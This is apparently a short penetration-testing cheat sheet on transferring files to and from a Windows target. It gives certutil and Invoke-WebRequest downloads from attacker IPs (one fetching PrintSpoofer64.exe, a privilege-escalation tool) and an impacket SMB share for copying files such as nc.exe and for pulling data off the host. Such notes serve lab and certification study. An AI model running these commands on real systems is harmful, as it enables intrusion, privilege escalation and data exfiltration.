To Windows
to window
Certutil
certutil -urlcache -f http://10.10.10.10/<file> <path to paste>
Invoke
$ProgressPreference = "SilentlyContinue”
Invoke-WebRequest -URI http://10.10.103.147:8000/PrintSpoofer64.exe -OutFile PrintSpoofer64.exe
SMB server
cd to dir which you want to share
impacket-smbserver share . -smb2support
on window
to check dir \\192.168.119.133\share
to copy from window copy <file> \\192.168.119.133\share\
to copy from kali copy \\192.168.119.133\share\nc.exe <path to paste>
Last updated